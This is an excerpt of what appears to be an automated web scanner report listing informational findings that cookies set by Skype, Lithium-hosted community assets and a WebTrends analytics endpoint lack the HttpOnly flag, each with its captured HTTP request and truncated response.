P3P: policyref="http://www.dell.com/w3c/p3p.xml", CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: search_bn=us|bsd|SearchBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:19:56 GMT; path=/
Set-Cookie: dellsearch=srchb=control&rpp=12; expires=Tue, 04-Oct-2011 16:19:56 GMT; path=/
Set-Cookie: StormSCookie=bandwidth=NA; domain=.dell.com; path=/
Vary: Accept-Encoding
Content-Length: 90930

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<!-- Contents of this file are Copyright 2011, Dell Inc. -->
<html>
<head>
   <TITLE>xss -
...[SNIP]...

11.88. https://secure.skype.com/login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.skype.com
Path:   /login

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login HTTP/1.1
Host: secure.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 21:30:27 GMT
Content-Type: text/html
Connection: keep-alive
Set-Cookie: SC=CC=:CCY=:LC=en:LIM=:TM=1315171827:TS=1314118390:TZ=:VAT=:VER=; expires=Mon, 03-Sep-2012 21:30:27 GMT; path=/; domain=.login.ab-testing
X-Stratus-Processing-Time: 0.0491
Set-Cookie: version=ad0dcdedf8; path=/
Vary: User-Agent,Accept-Encoding
Content-Length: 2331

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
...[SNIP]...

11.89. http://skypec.i.lithium.com/t5/image/serverpage/avatar-name/bike/avatar-theme/candy/avatar-collection/transit/avatar-display-size/message  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skypec.i.lithium.com
Path:   /t5/image/serverpage/avatar-name/bike/avatar-theme/candy/avatar-collection/transit/avatar-display-size/message

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t5/image/serverpage/avatar-name/bike/avatar-theme/candy/avatar-collection/transit/avatar-display-size/message HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/24028/highlight/true
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: skypec.i.lithium.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:10:01 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Set-Cookie: VISITORID=652814312; Domain=.i.lithium.com; Path=/
Content-Disposition: inline
Cache-Control: max-age=900
Last-Modified: Sun, 04 Sep 2011 21:10:01 GMT
Expires: Mon, 03 Sep 2012 21:10:01 GMT
Content-Length: 6757
Connection: close
Content-Type: image/png;charset=UTF-8

.PNG
.
...IHDR...@...$......n......tEXtSoftware.Adobe ImageReadyq.e<...$iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

11.90. http://skypec.i.lithium.com/t5/image/serverpage/avatar-name/camera/avatar-theme/candy/avatar-collection/tech/avatar-display-size/message  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skypec.i.lithium.com
Path:   /t5/image/serverpage/avatar-name/camera/avatar-theme/candy/avatar-collection/tech/avatar-display-size/message

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t5/image/serverpage/avatar-name/camera/avatar-theme/candy/avatar-collection/tech/avatar-display-size/message HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: http://community.skype.com/t5/English/ct-p/English?profile.language=en
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: skypec.i.lithium.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:09:48 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Set-Cookie: VISITORID=1625505944; Domain=.i.lithium.com; Path=/
Content-Disposition: inline
Cache-Control: max-age=900
Last-Modified: Sun, 04 Sep 2011 21:09:48 GMT
Expires: Mon, 03 Sep 2012 21:09:48 GMT
Content-Length: 7243
Connection: close
Content-Type: image/png;charset=UTF-8

.PNG
.
...IHDR...@...$......n......tEXtSoftware.Adobe ImageReadyq.e<...$iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

11.91. http://skypec.i.lithium.com/t5/image/serverpage/avatar-name/dog/avatar-theme/candy/avatar-collection/animals/avatar-display-size/message  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skypec.i.lithium.com
Path:   /t5/image/serverpage/avatar-name/dog/avatar-theme/candy/avatar-collection/animals/avatar-display-size/message

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t5/image/serverpage/avatar-name/dog/avatar-theme/candy/avatar-collection/animals/avatar-display-size/message HTTP/1.1
Host: skypec.i.lithium.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://community.skype.com/t5/Android/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 22:43:00 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Set-Cookie: VISITORID=1901988215; Domain=.i.lithium.com; Path=/
Content-Disposition: inline
Cache-Control: max-age=900
Last-Modified: Sun, 04 Sep 2011 22:43:00 GMT
Expires: Mon, 03 Sep 2012 22:43:00 GMT
Content-Length: 6611
Connection: close
Content-Type: image/png;charset=UTF-8

.PNG
.
...IHDR...@...$......n......tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

11.92. http://skypec.i.lithium.com/t5/image/serverpage/avatar-name/maracas/avatar-theme/candy/avatar-collection/music/avatar-display-size/message  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skypec.i.lithium.com
Path:   /t5/image/serverpage/avatar-name/maracas/avatar-theme/candy/avatar-collection/music/avatar-display-size/message

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t5/image/serverpage/avatar-name/maracas/avatar-theme/candy/avatar-collection/music/avatar-display-size/message HTTP/1.1
Host: skypec.i.lithium.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://community.skype.com/t5/Android/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 22:43:00 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Set-Cookie: VISITORID=392412041; Domain=.i.lithium.com; Path=/
Content-Disposition: inline
Cache-Control: max-age=900
Last-Modified: Sun, 04 Sep 2011 22:43:00 GMT
Expires: Mon, 03 Sep 2012 22:43:00 GMT
Content-Length: 8250
Connection: close
Content-Type: image/png;charset=UTF-8

.PNG
.
...IHDR...@...$......n......tEXtSoftware.Adobe ImageReadyq.e<...$iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

11.93. http://skypec.i.lithium.com/t5/image/serverpage/avatar-name/pyramids/avatar-theme/candy/avatar-collection/architecture/avatar-display-size/message  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skypec.i.lithium.com
Path:   /t5/image/serverpage/avatar-name/pyramids/avatar-theme/candy/avatar-collection/architecture/avatar-display-size/message

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t5/image/serverpage/avatar-name/pyramids/avatar-theme/candy/avatar-collection/architecture/avatar-display-size/message HTTP/1.1
Host: skypec.i.lithium.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://community.skype.com/t5/Android/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 22:43:00 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Set-Cookie: VISITORID=2140806654; Domain=.i.lithium.com; Path=/
Content-Disposition: inline
Cache-Control: max-age=900
Last-Modified: Sun, 04 Sep 2011 22:43:00 GMT
Expires: Mon, 03 Sep 2012 22:43:00 GMT
Content-Length: 6587
Connection: close
Content-Type: image/png;charset=UTF-8

.PNG
.
...IHDR...@...$......n......tEXtSoftware.Adobe ImageReadyq.e<...$iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

11.94. http://skypec.i.lithium.com/t5/image/serverpage/avatar-name/trumpet/avatar-theme/candy/avatar-collection/music/avatar-display-size/message  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skypec.i.lithium.com
Path:   /t5/image/serverpage/avatar-name/trumpet/avatar-theme/candy/avatar-collection/music/avatar-display-size/message

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t5/image/serverpage/avatar-name/trumpet/avatar-theme/candy/avatar-collection/music/avatar-display-size/message HTTP/1.1
Host: skypec.i.lithium.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://community.skype.com/t5/Android/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 22:43:00 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Set-Cookie: VISITORID=1079284173; Domain=.i.lithium.com; Path=/
Content-Disposition: inline
Cache-Control: max-age=900
Last-Modified: Sun, 04 Sep 2011 22:43:00 GMT
Expires: Mon, 03 Sep 2012 22:43:00 GMT
Content-Length: 8962
Connection: close
Content-Type: image/png;charset=UTF-8

.PNG
.
...IHDR...@...$......n......tEXtSoftware.Adobe ImageReadyq.e<...$iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

11.95. http://skypec.i.lithium.com/t5/image/serverpage/avatar-name/video/avatar-theme/candy/avatar-collection/tech/avatar-display-size/message  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skypec.i.lithium.com
Path:   /t5/image/serverpage/avatar-name/video/avatar-theme/candy/avatar-collection/tech/avatar-display-size/message

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t5/image/serverpage/avatar-name/video/avatar-theme/candy/avatar-collection/tech/avatar-display-size/message HTTP/1.1
Host: skypec.i.lithium.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://community.skype.com/t5/Android/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 22:43:00 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Set-Cookie: VISITORID=1675159679; Domain=.i.lithium.com; Path=/
Content-Disposition: inline
Cache-Control: max-age=900
Last-Modified: Sun, 04 Sep 2011 22:43:00 GMT
Expires: Mon, 03 Sep 2012 22:43:00 GMT
Content-Length: 7225
Connection: close
Content-Type: image/png;charset=UTF-8

.PNG
.
...IHDR...@...$......n......tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

11.96. http://skypec.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skypec.i.lithium.com
Path:   /t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://community.skype.com/t5/English/ct-p/English?profile.language=en
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: skypec.i.lithium.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:09:48 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Set-Cookie: VISITORID=603479162; Domain=.i.lithium.com; Path=/
Last-Modified: Wed, 03 Aug 2011 08:12:46 GMT
Expires: Mon, 03 Sep 2012 21:09:48 GMT
Cache-Control: s-maxage=562284
Vary: Accept-Encoding
Content-Length: 5958
Connection: close
Content-Type: text/javascript;charset=UTF-8


if(typeof LITHIUM=='undefined'){var LITHIUM={};};

LITHIUM.Loader=(function(){var functionCache=[];var loaded=false;return{"onLoad":function(func){functionCache.push(func);},getOnLoadFunctions:funct
...[SNIP]...

11.97. http://skypec.i.lithium.com/t5/scripts/3400302BF95FC3FDC82E2238CD4B03BF/lia-scripts-body-min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skypec.i.lithium.com
Path:   /t5/scripts/3400302BF95FC3FDC82E2238CD4B03BF/lia-scripts-body-min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t5/scripts/3400302BF95FC3FDC82E2238CD4B03BF/lia-scripts-body-min.js HTTP/1.1
Host: skypec.i.lithium.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://community.skype.com/t5/Android/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 22:42:59 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Set-Cookie: VISITORID=837874165; Domain=.i.lithium.com; Path=/
Last-Modified: Wed, 03 Aug 2011 08:10:58 GMT
Expires: Mon, 03 Sep 2012 22:42:59 GMT
Cache-Control: s-maxage=563424
Vary: Accept-Encoding
Content-Length: 16545
Connection: close
Content-Type: text/javascript;charset=UTF-8


if(jQuery.isLithium!==true){jQuery=LITHIUM.jQuery;}
;(function($LITH){LITHIUM.DropDownMenu=function(menuElementSelector,clickElementSelector,mouseoverElementSelector,closeMenuEvent){var menus=[];var
...[SNIP]...

11.98. http://skypec.i.lithium.com/t5/scripts/6141DE8643E58E1BA36A2E83A753DBF6/lia-scripts-body-min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skypec.i.lithium.com
Path:   /t5/scripts/6141DE8643E58E1BA36A2E83A753DBF6/lia-scripts-body-min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t5/scripts/6141DE8643E58E1BA36A2E83A753DBF6/lia-scripts-body-min.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://community.skype.com/t5/help/faqpage/faq-category-id/posting
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: skypec.i.lithium.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:10:21 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Set-Cookie: VISITORID=1880989334; Domain=.i.lithium.com; Path=/
Last-Modified: Wed, 03 Aug 2011 08:10:32 GMT
Expires: Mon, 03 Sep 2012 21:10:21 GMT
Cache-Control: s-maxage=562317
Vary: Accept-Encoding
Content-Length: 4687
Connection: close
Content-Type: text/javascript;charset=UTF-8


if(jQuery.isLithium!==true){jQuery=LITHIUM.jQuery;}
;(function($LITH){LITHIUM.Dialog=function(params){var triggerSelector=params.triggerSelector;var runOnceMap=$LITH(document.body).data("LITHIUM.Dia
...[SNIP]...

11.99. http://skypec.i.lithium.com/t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skypec.i.lithium.com
Path:   /t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/24028/highlight/true
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: skypec.i.lithium.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:10:01 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Set-Cookie: VISITORID=2119305899; Domain=.i.lithium.com; Path=/
Last-Modified: Wed, 03 Aug 2011 08:10:28 GMT
Expires: Mon, 03 Sep 2012 21:10:01 GMT
Cache-Control: s-maxage=562314
Vary: Accept-Encoding
Content-Length: 15854
Connection: close
Content-Type: text/javascript;charset=UTF-8


if(jQuery.isLithium!==true){jQuery=LITHIUM.jQuery;}
;(function($LITH){LITHIUM.DropDownMenu=function(menuElementSelector,clickElementSelector,mouseoverElementSelector,closeMenuEvent){var menus=[];var
...[SNIP]...

11.100. http://skypec.i.lithium.com/t5/scripts/A07927DB54138E290B0015853D34D7F4/lia-scripts-body-min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skypec.i.lithium.com
Path:   /t5/scripts/A07927DB54138E290B0015853D34D7F4/lia-scripts-body-min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t5/scripts/A07927DB54138E290B0015853D34D7F4/lia-scripts-body-min.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://community.skype.com/t5/forums/searchpage/tab/message?filter=location&location=Category%3AEnglish&q=xss
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: skypec.i.lithium.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:09:56 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Set-Cookie: VISITORID=461371398; Domain=.i.lithium.com; Path=/
Last-Modified: Wed, 03 Aug 2011 08:14:16 GMT
Expires: Mon, 03 Sep 2012 21:09:56 GMT
Cache-Control: s-maxage=562267
Vary: Accept-Encoding
Content-Length: 62201
Connection: close
Content-Type: text/javascript;charset=UTF-8


if(jQuery.isLithium!==true){jQuery=LITHIUM.jQuery;}
;(function($LITH){LITHIUM.CustomEvent=function(selector,triggerEvent){LITHIUM.Cache.create("CustomEvent",["elementId","triggerEvent"]);$LITH(selec
...[SNIP]...

11.101. http://skypec.i.lithium.com/t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://skypec.i.lithium.com
Path:   /t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://community.skype.com/t5/forums/searchpage/tab/message?filter=location&location=Category%3AEnglish&q=xss
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: skypec.i.lithium.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:09:56 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Set-Cookie: VISITORID=181743754; Domain=.i.lithium.com; Path=/
Last-Modified: Wed, 03 Aug 2011 08:12:46 GMT
Expires: Mon, 03 Sep 2012 21:09:56 GMT
Cache-Control: s-maxage=562286
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript;charset=UTF-8
Content-Length: 255135

;(function(){LITHIUM.Sandbox=function(){var localjQuery=window.jQuery;var local$=window.$;return{restore:function(){window.jQuery=(localjQuery!==undefined)?localjQuery:window.jQuery;window.$=(local$!=
...[SNIP]...

11.102. http://statse.webtrendslive.com/dcs2aqcdt10000oakh3fs9xoa_2g3x/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://statse.webtrendslive.com
Path:   /dcs2aqcdt10000oakh3fs9xoa_2g3x/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcs2aqcdt10000oakh3fs9xoa_2g3x/dcs.gif?&dcsdat=1315153146505&dcssip=www.radware.com&dcsuri=/Resources/AppWallSolution.aspx&dcsqry=%3Fsource=google%269gtype=search%269gkw=web%20application%20security%269gad=8494610116.1%269gpla=%269gag=2157798556%26gclid=CLjykYz_g6sCFQwaQgodAQy8yw&dcsref=http://www.google.com/search%3Fsourceid=chrome%26ie=UTF-8%26q=Houlihan%2BLokey%23sclient=psy%26hl=en%26source=hp%26q=waf%2Bweb%2Bapplication%2Bsecurity%26pbx=1%26oq=waf%2Bweb%2Bapplication%2Bsecurity%26aq=f%26aqi=q-w1%26aql=%26gs_sm=e%26gs_upl=21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0%26bav=on.2,or.r_gc.r_pw.%26fp=b7e6040383bebbf%26biw=1049%26bih=910&WT.co_f=50.23.123.106-4086325760.30173190&WT.vt_sid=50.23.123.106-4086325760.30173190.1315153146506&WT.vt_f_tlv=0&WT.tz=-5&WT.bh=11&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=White%20Paper%20Offer:%20Web%20Applications%20Security%20Overview%20and%20Radware%20AppWall%20Solution&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1049x910&WT.fi=Yes&WT.fv=10.3&WT.tv=8.0.3&WT.sp=@@SPLITVALUE@@&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1 HTTP/1.1
Host: statse.webtrendslive.com
Proxy-Connection: keep-alive
Referer: http://www.radware.com/Resources/AppWallSolution.aspx?source=google&9gtype=search&9gkw=web%20application%20security&9gad=8494610116.1&9gpla=&9gag=2157798556&gclid=CLjykYz_g6sCFQwaQgodAQy8yw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtNDA4NjMyNTc2MC4zMDE3MzE5MAAAAAAAAAAIAAAAVdcAADN1Xk4zdV5OUNcAAF11Xk5ddV5OLbAAABOxX05Mrl9OyOIAAK6xX05or19Ofv0AAK+xX05pr19OJfoAAKixX04bsV9OoP4AABuyX06wsV9OCJkAAMvKYk7NyWJOBAAAAPxEAABddV5OM3VeTkRFAAATsV9OTK5fTkooAAAbsl9OaK9fTggrAADLymJOzcliTgAAAAA-

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 16:19:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtNDA4NjMyNTc2MC4zMDE3MzE5MAAAAAAAAAAJAAAAVdcAADN1Xk4zdV5OUNcAAF11Xk5ddV5OLbAAABOxX05Mrl9OyOIAAK6xX05or19Ofv0AAK+xX05pr19OJfoAAKixX04bsV9OoP4AABuyX06wsV9OCJkAAMvKYk7NyWJOF7MAAPekY07WpGNOBQAAAPxEAABddV5OM3VeTkRFAAATsV9OTK5fTkooAAAbsl9OaK9fTggrAADLymJOzcliTvBFAAD3pGNO1qRjTgAAAAA-; path=/; expires=Wed, 01-Sep-2021 16:19:03 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
